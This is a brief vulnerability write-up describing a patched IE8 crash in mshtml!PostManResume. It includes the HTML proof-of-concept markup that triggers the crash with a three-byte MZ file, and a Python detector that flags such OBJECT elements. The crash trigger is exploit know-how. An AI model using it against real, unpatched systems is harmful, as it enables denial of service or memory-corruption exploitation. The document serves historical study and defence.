Loading a binary file (exe, zip, etc.) inside an OBJECT element and then reloading its contents via parentWindow.location.reload() crashes IE8 with a PROBABLY_EXPLOITABLE write near NULL in mshtml!PostManResume+0xcf.

<object id="oBin" data="bin.exe" type="text/html" width="400" height="60"></object>
<input type="button" onclick="oBin.parentWindow.location.reload();"
       value="Click here"> to reload object contents and crash the browser.

The binary file must have a valid MZ header (the first two bytes must be MZ). The bin.exe used here contains only three bytes: MZA — changing either M or Z prevents the crash. The !exploitable analysis classifies this as a user-mode write AV near NULL (hash 0x3e682f3b.0x231c030a). Tested on IE8/Win7 and IE8/XP.
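A static check for the trigger condition described above, added here as an example (it is not part of the original write-up): it flags OBJECT elements declared as text/html whose resource actually begins with the MZ magic. The function name `flag_mz_objects`, the `resources` mapping that stands in for a fetcher, and the sample data are assumptions made for illustration.

```python
from html.parser import HTMLParser

MZ_MAGIC = b"MZ"  # first two bytes of a DOS/PE executable header


class ObjectCollector(HTMLParser):
    """Collects the attributes of every <object> element in a page."""

    def __init__(self):
        super().__init__()
        self.objects = []

    def handle_starttag(self, tag, attrs):
        if tag == "object":
            # attrs is a list of (name, value); names arrive lowercased
            self.objects.append({k: (v or "") for k, v in attrs})


def flag_mz_objects(html, resources):
    """Return (id, data) for each <object> declared as text/html whose
    resource bytes begin with the MZ magic.

    `resources` (hypothetical) maps a data path to its bytes; it stands in
    for whatever the caller uses to fetch content (proxy cache, crawler, disk).
    """
    collector = ObjectCollector()
    collector.feed(html)
    findings = []
    for obj in collector.objects:
        declared = obj.get("type", "").split(";")[0].strip().lower()
        data = obj.get("data", "")
        body = resources.get(data)
        if declared == "text/html" and body is not None and body[:2] == MZ_MAGIC:
            findings.append((obj.get("id", ""), data))
    return findings


# Constructed sample input: the markup from the write-up plus two controls.
SAMPLE_HTML = """
<object id="oBin" data="bin.exe" type="text/html" width="400" height="60"></object>
<object id="oDoc" data="frame.html" type="text/html"></object>
<object id="oAlt" data="alt.exe" type="text/html"></object>
"""
SAMPLE_RESOURCES = {
    "bin.exe": b"MZA",           # the three-byte file described above
    "frame.html": b"<p>hi</p>",  # genuine HTML, must not be flagged
    "alt.exe": b"NZA",           # first byte changed, no MZ magic
}

if __name__ == "__main__":
    for obj_id, data in flag_mz_objects(SAMPLE_HTML, SAMPLE_RESOURCES):
        print(f"object id={obj_id!r} data={data!r}: MZ payload declared as text/html")
```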

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.